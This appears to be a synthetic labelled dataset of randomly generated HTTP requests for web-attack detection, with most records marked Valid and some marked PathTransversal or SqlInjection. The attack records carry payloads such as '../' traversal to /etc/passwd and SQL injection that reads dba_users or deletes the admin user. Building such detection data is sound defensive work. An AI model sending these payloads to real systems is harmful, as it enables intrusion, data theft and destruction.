Host: www.lo0jt.it
Connection: syyrr
Accept: */*;q=0.6
Accept-Charset: windows-1252;q=0.0, x-mac-icelandic, x-mac-roman
Accept-Encoding: 
Accept-Language: nhBoetSe-whWe1, s-oeu, tdubhn9-h;q=0.1, soexd-iesgTe
Cache-Control: no-cache
Client-ip: 30.121.144.102
Cookie: sgin1sddiiirn=Och1g
Cookie2: $Version="397"
Date: Wed, 09 May 07 22:10:32 CET
ETag: "LKEW9cX7PCyUPRb.S"
Expect: abde9n
From: lito@iAtsn.st
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Thu, 27 Apr 06 09:42:36 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Mar 05 17:20:03 CET
Max-Forwards: 3124
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: Digest username="mdaa0j"
Range: 038-288
Referer: /iivtme.asmx
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.5 (compatible; Konqueror/9.8; Linux i586; Ganleo6a; rarnkrm)
UA-CPU: MIPS
UA-Disp: 5084,527,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8704x5020
Via: 9.4 www.uOgbcgu.gif:4043, 9.8 198.36.80.119:812
Transfer-Encoding: gzip
Upgrade: D8c/9.2, rfff9/6.0, ios/5.5
Warning: 077 www.iusll2d.htm "OizonXfehci" "Mon, 05 Jan 09 09:29:14 UTC"
X-Forwarded-For: 48.146.201.35
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23070
Start - Id: 25648
class: Valid
GET /heh/enUOlVVwDZ-1n.sh?AinmfuReleWph=ys&teguH7=zPkGOKP3gu&erefEltsdcpabt=126&6hhhHtePr=te5uand+%7CeaaS&lNiiof9oe81e=m3gq&mmtdrA=oadntenosHeouq&aw=pet5z4tiolt HTTP/1.0
Host: www.rvhoe4R.ch:80
Connection: keep-alive
Accept: audio/x-wav;q=0.6, video/mpeg;q=0.9, application/*;q=0.7
Accept-Charset: x-mac-chinesesimp, cp-932;q=0.6, x-mac-roman;q=0.4
Accept-Encoding: compress, gzip;q=0.9
Accept-Language: *;q=0.2
Cache-Control: eee='urih3dn'
Client-ip: 57.161.129.174
Cookie: ntrb=htirdznhiuryBdusi;iitjrz=atonzn6lniea7doi;eriiesct8=n4I;4r=64;aoinyAedojCwf=660328
Cookie2: $Version="0"
Date: Sun, 04 Jan 04 19:41:02 UTC
ETag: W/"kELQtJwcvf2En4E"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 05 Jun 05 12:40:57 GMT
If-Unmodified-Since: Wed, 16 Dec 09 11:14:52 GMT
If-Match: *
If-None-Match: "Bh0y1@pQB-f3UF2a"
If-Range: Tue, 07 Jun 05 15:33:43 GMT
Max-Forwards: 2
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="39Be227EC208BA7CeFdeE2C2Aaa7BC69"
Range: -8653,3111-
Referer: /rino/e1s6/urmoi/9oee/os6iaa.png
TE: deflate,deflate
Trailer: Pragma
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 0.7; tI-th; rv:2.6.5) Gecko/72660744
UA-CPU: 68000
UA-Disp: 841,3299,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: Opt/7.1 226.114.86.184:2078
Transfer-Encoding: deflate
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25648
Start - Id: 3867
class: Valid
PUT /MhavingIAy.S0oechoj1/aoD.zPN5Jpassthrunode8/4ERXgTU4Z/zW/SsobneeakaeiuHteaEtc.shtml? HTTP/1.0
Content-Length: 228
Content-Language: l
Content-Encoding: identity
Content-Location: http://www.Yetjha.org/1sgfiltd/case/KeotE/1ttrtaa/WisRtt.sh
Content-MD5: ZWl0bHRvZTR6Nmluc1NiaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Feb 08 10:23:16 UTC
Last-Modified: Fri, 02 Oct 09 07:41:57 UTC
Host: www.wts4aesbt7.it
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r, euc-kr;q=0.1, utf-8;q=0.7, iso-2022-jp;q=0.5, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: dieh=yeargron
Client-ip: 127.179.20.25
Cookie: mnetcatRZ.L=136715791;anto=7winntl;uethus=702540;tnr=atlfiLscatocioW5m
Cookie2: $Version="511"
Date: Wed, 15 Aug 07 06:25:51 CET
ETag: W/"4CuJc2UOB2IJoeLBxRF"
Expect: 100-continue
If-Modified-Since: Mon, 06 Jul 09 18:57:56 GMT
If-Unmodified-Since: Fri, 03 Sep 04 15:18:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 1.4
Pragma: c6omshn=aB
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: Digest algorithm=9aitchco
Range: 459294-700,2-,-859
Referer: http://www.h7fSuo.fr/4btg/t6uten/rheo/ltt8.bin
TE: deflate;q=0.3,deflate,chunked;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/1.3 (compatible; MSIE 5.9; WinNT; owztjac; ehconisdi7)
UA-OS: WinNT
UA-Pixels: 6146x097
Via: 7.6 169.25.179.221
Transfer-Encoding: identity
Upgrade: 1dd/5.6
Warning: 358 50.141.159.101 "eefthcbta34PysTeoes" 
X-Forwarded-For: 25.247.174.254
X-Serial-Number: 937892727463428
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aenol9nliLe=94025065&nzic4msc=ntero&feEoShb=$5bgsound&et=mn te&Xindiezcytak=dnuaanyppowNcan&mXywDeQli=e7idfe7u8&wJ2XWjV=7syOemnu3&9t4i0a53nkoya7=oazgTJ&PpppsR=t&jneihec3eohTdae=hwOia6breplace&1Ent=ixugrtnhramahi&tra8Rde0=EMpkx

End - Id: 3867
Start - Id: 45527
class: PathTransversal
GET /scriptv28k@7/dkDlBm-N9S/teuf4i_dEznUqdym.php4?nrAqamdboGnkc1N=bslrcLrbEynuGCAE&Otussnee=enNtoa&Tnu=53968&oaeaealhpI0=056&fplor=Gcfanfhnihp&GPLz=tc+maruegcs3&e4aptr=enemfchome+%3B5adminhtpassslink%7CA&iieeixn=lhqio4&hSmsdlnbud=Url&3mynButael0a=s5iye&eyeeuhaecT=wt-tKGm&ertfhyeT5Ul=O7tmioch85ttnr6&etd2r78l6al=etgf&as0yaygl=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fesaslees%2Fveieinitat%2Ferllleit%2Fet.msf&rA8hfd0te=dtlre6 HTTP/1.0
Host: www.ahoic.org
Connection: keep-alive
Accept: audio/*, application/x-tar;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.8, big5, iso-8859-6
Accept-Encoding: compress
Accept-Language: *
Cache-Control: am=eiPesA0
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="99"
Date: Thu, 06 Nov 08 21:51:11 GMT
ETag: W/"wFLK5UzYD3@eO._7"
Expect: 100-continue
From: aFhd@iesknmut3c.net
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Fri, 10 Oct 08 03:40:36 CET
If-Match: "DaM@T@RYiLDJ4ejjayJ"
If-None-Match: "2xpFUXM0tsl_AHRt9t"
If-Range: *
Max-Forwards: 594
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 903-3,3-4324,-8
Referer: /oarLgN/nig8Vgh/ceimnheT/getllge/nreerE.jpeg
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 7.0; ls-hb; rv:6.3.3) Gecko/72132344
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: 9.5 239.83.237.158, 8.0 www.mYLq.png:21, 0.1 www.atNsadle.js
Transfer-Encoding: compress
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45527
Start - Id: 41571
class: SqlInjection
GET /0SqTzz4EhavingBh5/tuw9enn6tcecvoNitg/lxB8LmLsLhK/63AFT/tkKy/pI86/a-B3K6LL80lL1Zz5@Y/1mbp5.htm?ohivRee=maahngem84ns&io5r3eniwlu=yla3sh6gaemodu&oL202X@H6Yzu=Lt&hiframecatValslibtO=HiVskL&wp-.img2IhvgIXt=atvmdi%27+++++UNION++%2F**%2F+++SELECT++ve3++++FROM+dba_users+++++WHERE++++Th+++++like++++%27%2525&itmTd7ilhbe5cli=riSelEX HTTP/1.1
Host: www.htrniMf.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: koi8-r;q=0.1, x-mac-cyrillic;q=0.3, cp-936, x-mac-turkish
Accept-Encoding: identity;q=0.2, compress;q=0.6, identity, deflate;q=0.2, identity
Accept-Language: s1m-8se, nto-bwtsa;q=0.1, p-uif;q=0.5, mz-yfflaTlj;q=0.4
Cache-Control: only-if-cached
Client-ip: 237.68.176.239
Cookie: tihtncwetet=746;hecjm2ttaeSe=06t;ysoagr=ca+U emevalt;Jtao= &;LZBX1i.VRC=iOiassh;TUOVsXDRb=]aasbkntomfrom9fnsyosk
Cookie2: $Version="4"
Date: Tue, 12 Jul 05 08:22:25 GMT
ETag: "Mjovsj8NklqegQiwJGfc"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Wed, 13 Dec 06 22:51:25 GMT
If-Match: "D99.tO_aZFAN9RHejF"
If-None-Match: "QkbinUNAj@Jbnvxg"
If-Range: Wed, 09 Apr 08 01:36:02 GMT
Max-Forwards: 55
MIME-Version: 7.8
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: /cohsru/5ro8hoe/wsattuf.mdb
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/9.5 (X11; U; Linux i586 4.7; vr-se; rv:7.7.1) Gecko/25171776
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/2.9 www.uwip.gif, 3.0 169.72.154.142:51532, 0.2 42.201.7.214:312
Transfer-Encoding: gzip
Upgrade: Epoll/4.7, sesde/6.4, Uar/2.7, i4she/5.4, mukl/7.2
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41571
Start - Id: 46406
class: PathTransversal
GET /KformwinntFWujy0n/iOmef7Nrbnrwnaon.dll?sjome6tt=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&.XkOP-W=zcL&ag=7614482587&lewanitddnh=r1MEuUC&mrutyktFeqtela=i&gck6opF2c=oF-tR3kN-k&A2Me6d=t4i%29&ohyhsoWd=142&HpiGletj3iqa=70148 HTTP/1.0
Host: www.zowoyu.st:80
Connection: Ynehk
Accept: image/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip, compress
Accept-Language: *
Cache-Control: max-stale=7135
Client-ip: 43.17.188.82
Cookie: 1rApqhEionice=jainclude;coaso=50;guhddos=E >ee;doccetcr=YV(hh;Hie=5mN0nsdemifurnAa
Cookie2: $Version="521"
Date: Sun, 04 Mar 07 12:55:25 UTC
ETag: W/"CVbewARhs7NYFPa"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Wed, 05 Aug 09 19:32:22 GMT
If-Unmodified-Since: Mon, 19 Feb 07 13:50:28 GMT
If-Match: "yQa-3QOZ2XEAj@zOY6kt"
If-None-Match: *
If-Range: *
Max-Forwards: 49
MIME-Version: 3.5
Pragma: OmanePBh='e'
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: aqaf cysTse=aauaoyn
Range: 0-,-1441,-234089
Referer: http://ufruaee.net/eviTvitX/y8aq/cnoSu/8xgaon.jpeg
TE: gzip;q=0.2
Trailer: TE
User-Agent: onuoo/1.5.9.3
UA-CPU: MIPS
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 525x634
Via: FTP/5.2 178.83.37.119
Transfer-Encoding: identity
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46406
Start - Id: 6238
class: Valid
POST /njbvOme3/ej/usau0byebtirel/tt.Ep/rLUy@sMaeVik5vzRIE27/ieIrotz3tqoYiDca/0erre0/ctigsyaiwenoe/20-XU@Ol.dll? HTTP/1.0
Content-Length: 37
Content-Language: h1r,oqnaooY,euj4eetu
Content-Encoding: identity
Content-Location: http://www.lrqirnas.be/sEuae/njdir/55aoe.png
Content-MD5: bHByaUp1bE9vZTJFYW9qbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Apr 10 12:01:56 GMT
Last-Modified: Fri, 21 Oct 05 21:13:31 UTC
Host: 71.135.162.29:5875
Connection: Wo1rae2
Accept: application/*
Accept-Charset: x-mac-greek, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: icwvii-ltcrsoj, duhe-h6goo;q=0.7, tmlt0-ghl
Cache-Control: max-stale=688
Client-ip: 143.6.232.80
Cookie: rsmfsemtqsxf8=rcn;etcaee0reront=t\sri ;UftpLlvyCm2Z=23;trrgut=torkl(dHtrcpurr;Ohpru= %re;oonwaoekulhin8n=02583
Cookie2: $Version="357"
Date: Wed, 27 Apr 05 14:41:40 CET
ETag: W/"A1h4yqz177dhmsSk@.G9"
Expect: tu0ero=ileumf;eraet
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Sat, 26 Apr 08 23:52:15 CET
If-Unmodified-Since: Sat, 24 Dec 05 02:57:52 UTC
If-Match: "a38qCm9zYt5Hpm2.PTvB"
If-None-Match: *
If-Range: Thu, 03 Aug 06 13:02:43 CET
Max-Forwards: 76
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM bW9lbUFiaGVuclNqaW9vYmVXanQ0dHNkYWdpbGxqbnhlZ2FyZWVhUG1mbm1l
Authorization: Digest cnonce="so6oy"
Range: 08944-,040-34609
Referer: /ceeip/7W4oh.aspx
TE: trailers,chunked;q=0.1,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 3.4; T6-Wr; rv:7.0.5) Gecko/61539321
UA-CPU: 68000
UA-Disp: 8313,562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 601x2459
Via: atet1s/3.9 201.60.15.48
Transfer-Encoding: deflate
Upgrade: eson/2.5, eaxeaa/8.7, hoaeOa/7.7, tgaWm/7.3
Warning: 502 www.tuiesn.jpg:49189 "yihldehotit" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 30818494627249
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dnsHfz7Glr=sehn&ver1=t &a9=uhshtacces

End - Id: 6238
Start - Id: 7729
class: Valid
PUT /gZvuvcz/qAarsfhmsageoi/TmeiCtteNaesauxhyr.mspx? HTTP/1.1
Content-Length: 122
Content-Language: teBtatp,5oli
Content-Encoding: gzip
Content-Location: /e3nwlier/lssc2.msf
Content-MD5: bWx0dHRlcnFpYmhpYWl3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 04 18:33:36 CET
Last-Modified: Thu, 26 Jun 08 02:16:16 GMT
Host: 37.74.107.50
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=7596
Client-ip: 202.226.235.12
Cookie: sGNRsYwg7wI0=esnl;mpasswdbz=7378
Cookie2: $Version="5"
Date: Mon, 28 Dec 09 24:13:14 GMT
ETag: "c2mKD4d0c9MOSWGDj_"
Expect: lsoebqnj=eEeamdo;biEHtea=yneeSvNH
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Sat, 25 Jul 09 17:34:47 CET
If-Unmodified-Since: Sun, 01 Jan 06 21:18:42 GMT
If-Match: "z2nh.NJvyiGlfzs"
If-None-Match: "eRICX5xaScYluGu"
If-Range: Thu, 20 Oct 05 03:20:44 UTC
Max-Forwards: 6
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic c2pvY0RoYzplbmR3ZWw5
Authorization: jUea dbcd=psCaP1de
Range: 176685-
Referer: /ttde/rkaooije/eYcND/dau6S8Ch/tneeh.nsf
TE: trailers
Trailer: Accept-Charset
User-Agent: OteeyasIht (mATy6jhob5; oXbwzl4Ke4; hgm5UHT; s1FnGQ@-; htVqJEw)
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 297x5012
Via: HTTP/7.4 83.58.9.181:1039, FTP/5.1 www.6sumws.css
Transfer-Encoding: compress
Upgrade: kimait/9.7
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 575043034
----: ------------------------
~~~~~: ~~~~~~~~~~~

ad8d=euO&-qOM.=0272976&.ZQwLzU0NKFe=samag4hefT&r8zjnio4eaAcEf=tsrnk?fvA@n)imwindow.open&5rh4u=1&aLuGretbevTrEph=1NSv

End - Id: 7729
Start - Id: 41926
class: SqlInjection
GET /7Nzy4TLIxudGRuE/owtdieideueaNw/iQSnpielutlflta7nskr/me2otdifC/oEp_QIs9Z1uppq6RG9.js?3ha=itr0ae%7EO&Maees=794&seRmaofnopnhzp=mev&TfZ2servicesZ4eoxn=deaudphUgt&eiCEgsh=g%2Fconnectmnodeeiopenhtaccesa%29Eon%2B&3ogaPavare=xd2ndt%27%29%3BDELETEFROMusersWHEREupper%28username%29+%3Dupper%28++++%27admin&ait3eares=iUsrSreLme&oltb=otiIEYgim%40FS&esxcrewtaEtwea=esro&M6WformC8R3_tmp7=i9DVLLl&chnoikaPtn=eot23etFiis HTTP/1.1
Host: www.uNi0sdirtu.org:975
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eblT-szhzro, eCwS-kP1rna5y;q=0.0
Cache-Control: no-store
Client-ip: 21.123.50.241
Cookie: aad3nthtt=lvdhadfesana;saudbegculs7dSk=3mmawm
Cookie2: $Version="26"
Date: Mon, 17 Apr 06 19:53:25 GMT
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: uedR4wh@iydiiAh.st
If-Modified-Since: Wed, 04 May 05 11:11:53 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: "jzg.4KCCUmx9aRaI@2z3"
If-None-Match: *
If-Range: Sat, 18 Apr 09 13:12:21 UTC
Max-Forwards: 307
MIME-Version: 8.6
Pragma: Tertaen='tE'
Proxy-Authorization: Digest response="db02e31B81f2C3Ca2dDabA9e0D0Df81F"
Authorization: Digest qop=auth
Range: -0
Referer: http://www.InShsBch.biz/ldyly.sh
TE: deflate;q=0.9,trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: Mozilla/7.9 (X11; U; Linux i586 9.6; te-iH; rv:8.4.8) Gecko/74836407
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 010x854
Via: 6.1 137.44.108.207:280, FTP/1.8 152.207.15.205
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41926
Start - Id: 2444
class: Valid
GET /dssabto4sh/5haP/tNjfhghahl9ytiygl/xIimcaeT7etR4a/ntu2Escneluft/s3iSHOnekjGb/yPbCq/re6OciveelnN/eMeEe7eAfatfi/strw82vSuCpPU52mRA.php?E3e=ren HTTP/1.0
Host: www.intaeaor.st
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: hjnsz-na;q=0.1, ew-5oecat, aaonyt-aneb5;q=0.2, Otxoiso-umrbEptu;q=0.3
Cache-Control: no-store
Client-ip: 17.92.203.155
Cookie: Mndad=Na+OOpyrcp9[h<[)6;7noqdtot=o7jvoXg
Cookie2: $Version="691"
Date: Thu, 28 Sep 06 22:46:19 GMT
ETag: "gWlswCk9lSuY85ZMZB"
Expect: 8oacabCe
From: i6anwg@6eqonb.st
If-Modified-Since: Mon, 09 Nov 09 23:19:15 CET
If-Unmodified-Since: Sat, 25 Nov 06 16:51:09 CET
If-Match: "gkMcErlSp2UA8-fRMgo"
If-None-Match: *
If-Range: *
Max-Forwards: 723
MIME-Version: 8.3
Pragma: ascueerw='45eddh'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: Digest realm
Range: 720089-,-2922,87-
Referer: /teaeeah0/sslg/qnreeb.cgi
TE: deflate;q=0.0
Trailer: Via
User-Agent: Mozilla/6.7 (X11; U; Linux i386 0.6; wn-pe; rv:2.3.9) Gecko/58487146
UA-CPU: x86
UA-Disp: 012,6333,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 750x609
Via: HTTP/3.3 63.151.53.49
Transfer-Encoding: deflate
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 861 www.bgseo.shtml "IrtAieAiic" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2444
Start - Id: 13017
class: Valid
GET /4oEdd6hmolrtCmA/lX05W/2haamconeea/ewseosn/e0gQ7saECcce6Tm/@U/lbumtiii/QMJIjPWIjiT/iaApPZ0SQn.php?@O0exec3687O=aheT2Kaq%7E&tUhdfefce=z&dee6rrkqadeK=ai+&TStdnisLea=0&bfkeNh7Io=aRTuwcr%7CaAde HTTP/1.0
Host: www.leerreLi.net
Connection: vnoez
Accept: */*;q=0.3
Accept-Charset: gb2312;q=0.1, x-mac-chinesesimp
Accept-Encoding: deflate;q=0.7, deflate
Accept-Language: *
Cache-Control: iuiwo5='dcrish'
Client-ip: 82.22.221.79
Cookie: HNBboD.e@mY=2;qtedA0u9dol=o@89r
Cookie2: $Version="104"
Date: Fri, 18 Aug 06 14:52:56 UTC
ETag: "6FXq@zy2y4TF2@wA0@3v"
Expect: Xeaushv
From: hhrsnmqd@cyrn.com
If-Modified-Since: Sat, 20 Jan 07 24:01:51 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:56:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 10:06:10 GMT
Max-Forwards: 305
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic YW53aWVhOmRzM21hZWh2
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: http://Eh9t.be/tyeehwr/AeRieMlA/uvptn.tiff
TE: trailers
Trailer: Range
User-Agent: esec/3.3.2.5.1
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: HTTP/7.0 www.TliXt.png, numrrt/0.3 241.169.255.255:5157
Transfer-Encoding: compress
Upgrade: zflt/3.2, paby/1.7, ges/5.4, den/9.0, ioa/1.3
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13017
Start - Id: 8662
class: Valid
GET /to9ct9aatioseieen/6rmFUoBNl-@td/cfromyvr/sIHN2Iu1Y5n4CVMbHNkR.js?1EeNNKa.tn.=include%7Erdo&t6hr=1&i9oyw=%3Buttvei%40%3Bor3ehoa&erbe=processing-instruction+&f55nb=wxXgYezh HTTP/1.0
Host: www.veyKe.uk
Connection: close
Accept: */*
Accept-Charset: us-ascii, windows-1257, gb2312, x-mac-turkish
Accept-Encoding: 
Accept-Language: 5U-oanl;q=0.0, la8Et7-simReh
Cache-Control: max-stale=605
Client-ip: 225.249.20.48
Cookie: oegzfi9suwin9ee=6444;iTvs=685692;AotinitEAdSdti=|[ku? xterm;rh8jeethzHnh=hYfnEHjZ3l;1enrm=amdm;tiwra0rqTerdn=0317
Cookie2: $Version="48"
Date: Thu, 22 Apr 10 18:05:54 UTC
ETag: "bqqF@POc4a5wCT5plef"
Expect: huicy=ryees
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Thu, 19 Apr 07 22:10:49 GMT
If-Unmodified-Since: Fri, 23 Jul 04 03:28:21 UTC
If-Match: *
If-None-Match: *
If-Range: "7XIttW2oL-ryMqgM-S"
Max-Forwards: 6744
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: ns7siw llzif0=ebeiais
Authorization: slploo 6itspo9c=eDe8
Range: -766,58-986789
Referer: /odbpma.cfm
TE: trailers,deflate
Trailer: Referer
User-Agent: t4INHLRm4 http://www.gSrgf8oo.be
UA-CPU: x86
UA-Disp: 051,717,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8393x485
Via: 2.3 www.hyftfoe.js:25, yrs/8.7 www.torl9es3.jpg, lf7yph/9.5 236.66.45.91
Transfer-Encoding: fse6; odieatp=ten9xnc2
Upgrade: eytbnl/9.0, edhsn/3.9
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8662
Start - Id: 31554
class: Valid
GET /eydAlG/qWenWkusONkqnKOBxB/etofeqcnuiNhxlsur/atdltqsiu5nxesf.tiff?iaa=3&cnihlool0eRnEz=daeoeutHmcniAtone&pd24qGP=ramwatm&2ntkhSo=639511&atFaatiahr=jiimochaei+-iMtai5binSu&7A4FlEMvpMI=2515 HTTP/1.1
Host: 100.41.46.13
Connection: keep-alive
Accept: audio/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 53.47.191.85
Cookie: r5r=dh'iBo
Cookie2: $Version="3"
Date: Fri, 09 Sep 05 03:23:26 CET
ETag: W/"w4kvgE8p5Yau4wovab"
Expect: 100-continue
From: 2ief@fcey7.uk
If-Modified-Since: Wed, 15 Apr 09 14:27:08 CET
If-Unmodified-Since: Wed, 30 Jan 08 02:15:19 UTC
If-Match: "DmADQ8BMyFfbQtj8eRA"
If-None-Match: "juWjPmABUxiG7MBsdzP"
If-Range: Sat, 13 Jan 07 11:09:37 GMT
Max-Forwards: 26
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: NTLM Mm9hbmhhMTZiaGVzZGVxaHJzc0lucm9laXNsZWExaXdmZ2U3RGxobXM5c3U=
Range: -98393
Referer: http://ck7l.it/kdAewng/dtOpA/d2eh.doc
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 2.7; A8-Dy; rv:2.1.1) Gecko/63360066
UA-CPU: x86
UA-Disp: 201,1395,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8565x5206
Via: ipe/9.1 www.atAgo7bU.html, HTTP/6.9 196.208.94.203
Transfer-Encoding: compress
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 368 www.ergmb.gif "hlleNwwiAeidy" 
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 7616561595248452
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31554
Start - Id: 7098
class: Valid
